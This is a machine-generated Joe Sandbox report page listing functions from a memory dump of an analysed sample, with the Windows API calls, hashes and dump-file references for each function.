Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: LongWindow$InvalidateMessageRectSend
String ID:
API String ID: 3340791633-0
Opcode ID: 0749eb397b34ace24d9724e0c380ce24965d95aa45d2b2bf62709a1796c76b31
Instruction ID: 9bb660a9e5affdc31189030e4770a9aa3ac4e22cfb43c71502b53c8cb80d0fc1
Opcode Fuzzy Hash: 0749eb397b34ace24d9724e0c380ce24965d95aa45d2b2bf62709a1796c76b31
Instruction Fuzzy Hash: F631C338A77A29BFEB24AE14CC06FE83765AB05391F584081BA10961E1C7B49EA09B51

Function 0025AB9C Relevance: 6.1, APIs: 4, Instructions: 103keyboardwindowCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?,76AAC0D0,?,00008000), ref: 0025ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0025AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0025AC74
SendInput.USER32(00000001,?,0000001C,76AAC0D0,?,00008000), ref: 0025ACC6

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 736bca36aabaa920942e8205088fb1ebb654a7e7be52390997925b0107a6a905
Instruction ID: 68aed332d64797a7164ce188d2d38f84b1608ef23b85ac5b25e20c3b05b27322
Opcode Fuzzy Hash: 736bca36aabaa920942e8205088fb1ebb654a7e7be52390997925b0107a6a905
Instruction Fuzzy Hash: DA313B30A20319AFEF35CF648C0A7FA7BA5AB85313F04431BEC85561D0D37489A9876A

Function 00287674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 0028769A
GetWindowRect.USER32(?,?), ref: 00287710
PtInRect.USER32(?,?,00288B89), ref: 00287720
MessageBeep.USER32(00000000), ref: 0028778C

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: 41eded24c51a626f30d0128c8010b6756c7da9561b969ae80c8325f7b65ccfe8
Instruction ID: 515dc03774899cbe8bacb1873bd3a61a8a79ef30da20c407b8500161ae3bae2c
Opcode Fuzzy Hash: 41eded24c51a626f30d0128c8010b6756c7da9561b969ae80c8325f7b65ccfe8
Instruction Fuzzy Hash: 1741A23C616215DFCB01EF58D899EA9B7F5FF49314F2940A8E8149B2A1D730E961CF90

Function 002816DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 002816EB

Part of subcall function 00253A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00253A57
Part of subcall function 00253A3D: GetCurrentThreadId.KERNEL32 ref: 00253A5E
Part of subcall function 00253A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002525B3), ref: 00253A65

GetCaretPos.USER32(?), ref: 002816FF
ClientToScreen.USER32(00000000,?), ref: 0028174C
GetForegroundWindow.USER32 ref: 00281752

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: d1940cbe7c73af8eb6bd65dbaa79084a856d3a92a87c66a1eec1905bcdb9ce28
Instruction ID: 66d361bcaf54a557538a94df784dff1bee0485f5bb029b12ba8796fe7c90c9f9
Opcode Fuzzy Hash: d1940cbe7c73af8eb6bd65dbaa79084a856d3a92a87c66a1eec1905bcdb9ce28
Instruction Fuzzy Hash: CE315E75D11149AFCB00EFA9C881CAEFBFDEF58304B5480A9E515E7251DB319E45CBA0

Function 0025D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0025D501
Process32FirstW.KERNEL32(00000000,?), ref: 0025D50F
Process32NextW.KERNEL32(00000000,?), ref: 0025D52F
CloseHandle.KERNEL32(00000000), ref: 0025D5DC

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: d3233655119e777c3e9f43188b0e4058d7f1de62adc157e068bf75d1667ecb66
Instruction ID: 8ffc7eae4ce3060d1f2dd12d65845fd2e043f322c7d7af798b4c6d3a21348b96
Opcode Fuzzy Hash: d3233655119e777c3e9f43188b0e4058d7f1de62adc157e068bf75d1667ecb66
Instruction Fuzzy Hash: 4731C2710083059FD310EF54D885ABFBBF8EF99344F54092DF685861A2EB719A48CBA2

Function 00288FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00209BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00209BB2

GetCursorPos.USER32(?), ref: 00289001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00247711,?,?,?,?,?), ref: 00289016
GetCursorPos.USER32(?), ref: 0028905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00247711,?,?,?), ref: 00289094

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 0284221dd79a3492140e3f5b89162d7368ea5a9abf939d583660d8b09eac7dad
Instruction ID: e76d2c2421d3282ddc95da768b7d94d6dd3835036a3ea921ea9caedf1c9d9d32
Opcode Fuzzy Hash: 0284221dd79a3492140e3f5b89162d7368ea5a9abf939d583660d8b09eac7dad
Instruction Fuzzy Hash: BF21F339612018EFDB259F94DC58EFA3BB9EF4A310F280065F506571A2C33599A0DF60

Function 0025D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,0028CB68), ref: 0025D2FB
GetLastError.KERNEL32 ref: 0025D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0025D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,0028CB68), ref: 0025D376

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: d261cd465e1cc0e1ab8b26ceee2a23cb7cfdf00bf69a95e14f3b7129a874ac7c
Instruction ID: f2f39ed7fbc825937b28d52aeab2ecabe423c01578fb1b5b62eb3cf9bb18a4b3
Opcode Fuzzy Hash: d261cd465e1cc0e1ab8b26ceee2a23cb7cfdf00bf69a95e14f3b7129a874ac7c
Instruction Fuzzy Hash: 8321D374516202AF8320EF24D88186AB7E4EF56365F204A5DFC99C72E1D730D91ACF97

Function 00251571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00251014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0025102A
Part of subcall function 00251014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00251036
Part of subcall function 00251014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00251045
Part of subcall function 00251014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0025104C
Part of subcall function 00251014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00251062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 002515BE
_memcmp.LIBVCRUNTIME ref: 002515E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00251617
HeapFree.KERNEL32(00000000), ref: 0025161E

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 8e1d291d1cd671a2b49af26a8a164748ba60534db4b558d25f1ba7a39cd2f899
Instruction ID: 693bef94d70f16bc6e77e00ae1f14cb73d09487b551f4f9a1d901e13f300329b
Opcode Fuzzy Hash: 8e1d291d1cd671a2b49af26a8a164748ba60534db4b558d25f1ba7a39cd2f899
Instruction Fuzzy Hash: FB21CF31E50109EFDF00DFA4C948BEEB7B8EF40346F184459E801AB240E730AE28CBA4

Function 00282782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 0028280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00282824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 00282832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00282840

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 01c069321450c1a036eaa5f415dfdbf8e4a097ecd14bc930e82a2ab1201328d3
Instruction ID: dc3ae217b33fa5c9a1cca4ee74ad85cb2bcb8fd8acb38f83ec4ac9a038696f99
Opcode Fuzzy Hash: 01c069321450c1a036eaa5f415dfdbf8e4a097ecd14bc930e82a2ab1201328d3
Instruction Fuzzy Hash: 2F21F439216111EFDB14AB24D844F6AB795EF45324F248158F4168B6E2C775FC46CBA0

Function 002578F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00258D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0025790A,?,000000FF,?,00258754,00000000,?,0000001C,?,?), ref: 00258D8C
Part of subcall function 00258D7D: lstrcpyW.KERNEL32(00000000,?,?,0025790A,?,000000FF,?,00258754,00000000,?,0000001C,?,?,00000000), ref: 00258DB2
Part of subcall function 00258D7D: lstrcmpiW.KERNEL32(00000000,?,0025790A,?,000000FF,?,00258754,00000000,?,0000001C,?,?), ref: 00258DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00258754,00000000,?,0000001C,?,?,00000000), ref: 00257923
lstrcpyW.KERNEL32(00000000,?,?,00258754,00000000,?,0000001C,?,?,00000000), ref: 00257949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00258754,00000000,?,0000001C,?,?,00000000), ref: 00257984

Strings

cdecl, xrefs: 0025797B

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 94fa4b8530b2afa0699c8b7b8d11c1f668add26e012ba81cb47d3adc3a2e6b2d
Instruction ID: 941a96beb5c79252ee05e97102cfa4796e7f55c9cf4fbe5ff79c19c780a444a5
Opcode Fuzzy Hash: 94fa4b8530b2afa0699c8b7b8d11c1f668add26e012ba81cb47d3adc3a2e6b2d
Instruction Fuzzy Hash: BE11293A211342ABCB159F39E848E7A77E5FF85351B10402AFC06C72A4EB719825C775

Function 00285660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 002856BB
_wcslen.LIBCMT ref: 002856CD
_wcslen.LIBCMT ref: 002856D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 00285816

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 6ff78d5fdad98a0a6a7be5ec4a6a119a1a7863229d9f392af3a331f68052f108
Instruction ID: fed95dc44ce5c1fdc861889cf8ecf330e2efab94c843ff311be6d21814ced427
Opcode Fuzzy Hash: 6ff78d5fdad98a0a6a7be5ec4a6a119a1a7863229d9f392af3a331f68052f108
Instruction Fuzzy Hash: 1C11E43963262596DF20AF618C85AEE77ACBF11361B104126F915D60C1E7B0C9A4CFA0

Function 00251A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00251A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00251A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00251A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00251A8A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 3784fe69665accdbe515429b9673d419714ab63f39fb812b10ff095e844f0c97
Instruction ID: a210db42136d59236ee386ecf5a711751a0aa73d1e20ff9aa8733b5ce2577279
Opcode Fuzzy Hash: 3784fe69665accdbe515429b9673d419714ab63f39fb812b10ff095e844f0c97
Instruction Fuzzy Hash: C1110C3AD01219FFEB11DBA5CD85FADBB78EF04750F200091EA04B7294D6716E60DB94

Function 0025E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0025E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0025E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0025E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0025E24D

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: f20acd9644e724c11fe30842424fbd8ba9866cea96f03749dda0321e055f06e3
Instruction ID: 3d512cb6f280cb9f106582e16d607489a7cc3a6e48dc937ac180d1b59524ee3c
Opcode Fuzzy Hash: f20acd9644e724c11fe30842424fbd8ba9866cea96f03749dda0321e055f06e3
Instruction Fuzzy Hash: 4511E576914254ABCB059FA8BC0DE9A7BAC9B46325F104255FC24D3296D7B08E1487A0

Function 0021D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0021CFF9,00000000,00000004,00000000), ref: 0021D218
GetLastError.KERNEL32 ref: 0021D224
__dosmaperr.LIBCMT ref: 0021D22B
ResumeThread.KERNEL32(00000000), ref: 0021D249

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: e00212c76dea56315c0d778bef1adb7406fee0a0a5f4ca37d688b1edce564adb
Instruction ID: c270fe1af93b75d82364ccb603450e89a13484bf0a05bfd0e43d9cddd6f204b7
Opcode Fuzzy Hash: e00212c76dea56315c0d778bef1adb7406fee0a0a5f4ca37d688b1edce564adb
Instruction Fuzzy Hash: FE012636425204FBC7115FA5EC09BEB7BA9DFA1330F200219FC35920D1CB7188A1CBA0

Function 001F600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 001F604C
GetStockObject.GDI32(00000011), ref: 001F6060
SendMessageW.USER32(00000000,00000030,00000000), ref: 001F606A

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 231668fba8de350b1bed5337de90cce0b96df8c67e0a7e6af8bae5f804007c20
Instruction ID: 03a4b0f3ec8ad233cca00d2f0a24056d83ba7190163d79f0b34f722efdad00d1
Opcode Fuzzy Hash: 231668fba8de350b1bed5337de90cce0b96df8c67e0a7e6af8bae5f804007c20
Instruction Fuzzy Hash: CB116D7250250CBFEF169FA49C48EFABB6DEF093A4F240215FB1552110DB369C60DBA0

Function 00213B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00213B56

Part of subcall function 00213AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00213AD2
Part of subcall function 00213AA3: ___AdjustPointer.LIBCMT ref: 00213AED

_UnwindNestedFrames.LIBCMT ref: 00213B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00213B7C
CallCatchBlock.LIBVCRUNTIME ref: 00213BA4

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: c83991109ad05a95538a01c39394f6ea4b2943b9d4a72460d65961fdf2c1c46b
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: A8012972110149BBDF12AE95CC42EEB3BAAEF68758F044014FE4856121D732E9B1DFA0

Function 00223073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,001F13C6,00000000,00000000,?,0022301A,001F13C6,00000000,00000000,00000000,?,0022328B,00000006,FlsSetValue), ref: 002230A5
GetLastError.KERNEL32(?,0022301A,001F13C6,00000000,00000000,00000000,?,0022328B,00000006,FlsSetValue,00292290,FlsSetValue,00000000,00000364,?,00222E46), ref: 002230B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0022301A,001F13C6,00000000,00000000,00000000,?,0022328B,00000006,FlsSetValue,00292290,FlsSetValue,00000000), ref: 002230BF

Memory Dump Source

Source File: 00000000.00000002.2382843133.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true

Associated: 00000000.00000002.2382823401.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.000000000028C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382905218.00000000002B2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382964413.00000000002BC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2382986592.00000000002C4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1f0000_eLo1khn7DQ.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID:
API String ID: 3177248105-0
Opcode ID: a46de6ea5db227d80dc9c13758f2c163553a6fce6110ff9c3a6dbd5ba7a433a2
Instruction ID: 09c878c32bd04431f33455644b2a9d0f2c84e1d7c3572c12a9f1bffe3c32146e
Opcode Fuzzy Hash: a46de6ea5db227d80dc9c13758f2c163553a6fce6110ff9c3a6dbd5ba7a433a2
Instruction Fuzzy Hash: 9C017536722237BBC7218AB9BC4895677989B45B61B210624F905E7140D725DA1586F0

